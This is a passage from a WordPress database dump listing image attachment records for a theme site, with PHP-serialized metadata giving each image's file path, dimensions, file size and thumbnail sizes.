:6:\"height\";i:799;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:666;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:37:\"background-about-section1-960x473.png\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:34769;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:37:\"background-about-section1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:254;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:37:\"background-about-section1-600x288.png\";s:5:\"width\";i:600;s:6:\"height\";i:288;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17509;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:37:\"background-about-section1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:98;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(59,718,'_wp_attached_file','2022/06/avatar.jpg'),(60,718,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:74;s:6:\"height\";i:74;s:4:\"file\";s:18:\"2022/06/avatar.jpg\";s:8:\"filesize\";i:6117;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(62,752,'_wp_attached_file','2022/06/01.png'),(63,752,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:95;s:6:\"height\";i:110;s:4:\"file\";s:14:\"2022/06/01.png\";s:8:\"filesize\";i:2563;s:5:\"sizes\";a:1:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:13:\"01-95x100.png\";s:5:\"width\";i:95;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2055;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(65,753,'_wp_attached_file','2022/06/02.png'),(66,753,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:96;s:6:\"height\";i:109;s:4:\"file\";s:14:\"2022/06/02.png\";s:8:\"filesize\";i:1814;s:5:\"sizes\";a:1:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:13:\"02-96x100.png\";s:5:\"width\";i:96;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1284;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(68,754,'_wp_attached_file','2022/06/03.png'),(69,754,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:88;s:6:\"height\";i:109;s:4:\"file\";s:14:\"2022/06/03.png\";s:8:\"filesize\";i:2022;s:5:\"sizes\";a:1:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:13:\"03-88x100.png\";s:5:\"width\";i:88;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1467;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(71,755,'_wp_attached_file','2022/06/04.png'),(72,755,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:107;s:6:\"height\";i:108;s:4:\"file\";s:14:\"2022/06/04.png\";s:8:\"filesize\";i:2420;s:5:\"sizes\";a:1:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"04-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2253;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(74,756,'_wp_attached_file','2022/06/06.png'),(75,756,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:106;s:6:\"height\";i:108;s:4:\"file\";s:14:\"2022/06/06.png\";s:8:\"filesize\";i:2530;s:5:\"sizes\";a:1:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"06-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2333;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(77,757,'_wp_attached_file','2022/06/05.jpg.png'),(78,757,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:105;s:6:\"height\";i:109;s:4:\"file\";s:18:\"2022/06/05.jpg.png\";s:8:\"filesize\";i:2705;s:5:\"sizes\";a:1:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:18:\"05.jpg-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2447;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(80,800,'_wp_attached_file','2022/06/bg.png'),(81,800,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:490;s:6:\"height\";i:736;s:4:\"file\";s:14:\"2022/06/bg.png\";s:8:\"filesize\";i:31999;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"bg-200x300.png\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4467;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"bg-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1978;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:14:\"bg-490x660.png\";s:5:\"width\";i:490;s:6:\"height\";i:660;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14089;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:14:\"bg-390x473.png\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10337;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:14:\"bg-378x736.png\";s:5:\"width\";i:378;s:6:\"height\";i:736;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11999;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:14:\"bg-490x473.png\";s:5:\"width\";i:490;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10655;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"bg-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5904;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"bg-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1020;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(83,921,'_wp_attached_file','2022/06/team-01.jpg'),(84,921,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:330;s:6:\"height\";i:470;s:4:\"file\";s:19:\"2022/06/team-01.jpg\";s:8:\"filesize\";i:61910;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"team-01-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12696;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"team-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5444;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"team-01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16308;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"team-01-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3144;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(85,922,'_wp_attached_file','2022/06/team-02.jpg'),(86,922,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:330;s:6:\"height\";i:470;s:4:\"file\";s:19:\"2022/06/team-02.jpg\";s:8:\"filesize\";i:71687;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"team-02-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15297;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"team-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6288;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"team-02-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20545;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"team-02-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3415;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(87,923,'_wp_attached_file','2022/06/team-03.jpg'),(88,923,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:330;s:6:\"height\";i:470;s:4:\"file\";s:19:\"2022/06/team-03.jpg\";s:8:\"filesize\";i:51060;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"team-03-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12759;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"team-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5816;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"team-03-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16497;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"team-03-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3346;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(89,924,'_wp_attached_file','2022/06/team-04.jpg'),(90,924,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:330;s:6:\"height\";i:470;s:4:\"file\";s:19:\"2022/06/team-04.jpg\";s:8:\"filesize\";i:75990;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"team-04-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20539;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"team-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8408;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"team-04-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24743;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"team-04-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4366;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(91,925,'_wp_attached_file','2022/06/team-05.jpg'),(92,925,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:330;s:6:\"height\";i:470;s:4:\"file\";s:19:\"2022/06/team-05.jpg\";s:8:\"filesize\";i:52326;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"team-05-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12900;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"team-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5813;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"team-05-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16389;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"team-05-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3286;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(93,926,'_wp_attached_file','2022/06/team-06.jpg'),(94,926,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:330;s:6:\"height\";i:470;s:4:\"file\";s:19:\"2022/06/team-06.jpg\";s:8:\"filesize\";i:57490;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"team-06-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14766;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"team-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6340;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"team-06-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19310;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"team-06-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3490;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(95,937,'_wp_attached_file','2022/06/bg-lines-team.png'),(96,937,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:70;s:6:\"height\";i:40;s:4:\"file\";s:25:\"2022/06/bg-lines-team.png\";s:8:\"filesize\";i:319;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(98,984,'_wp_attached_file','2022/06/bg-section-services.png'),(99,984,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:460;s:6:\"height\";i:423;s:4:\"file\";s:31:\"2022/06/bg-section-services.png\";s:8:\"filesize\";i:83105;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"bg-section-services-300x276.png\";s:5:\"width\";i:300;s:6:\"height\";i:276;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:84495;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"bg-section-services-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25937;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:31:\"bg-section-services-390x423.png\";s:5:\"width\";i:390;s:6:\"height\";i:423;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:84160;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:31:\"bg-section-services-378x423.png\";s:5:\"width\";i:378;s:6:\"height\";i:423;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:81793;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:31:\"bg-section-services-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:93257;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:31:\"bg-section-services-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12952;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(101,1153,'_wp_attached_file','2022/06/modern-villa.jpg'),(102,1153,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:1500;s:4:\"file\";s:24:\"2022/06/modern-villa.jpg\";s:8:\"filesize\";i:204645;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"modern-villa-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10175;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"modern-villa-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95933;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"modern-villa-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4182;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"modern-villa-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118969;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:24:\"modern-villa-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54335;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:24:\"modern-villa-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25746;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:24:\"modern-villa-378x824.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44533;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:24:\"modern-villa-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45999;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:24:\"modern-villa-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12377;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:24:\"modern-villa-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75577;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:24:\"modern-villa-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2377;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(104,1154,'_wp_attached_file','2022/06/vintage-design.jpg'),(105,1154,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:1500;s:4:\"file\";s:26:\"2022/06/vintage-design.jpg\";s:8:\"filesize\";i:298871;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"vintage-design-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19274;}s:5:\"large\";a:5:{s:4:\"file\";s:27:\"vintage-design-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144700;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"vintage-design-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8549;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"vintage-design-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:174212;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:26:\"vintage-design-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107844;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:26:\"vintage-design-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48843;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:26:\"vintage-design-378x824.jpg\";s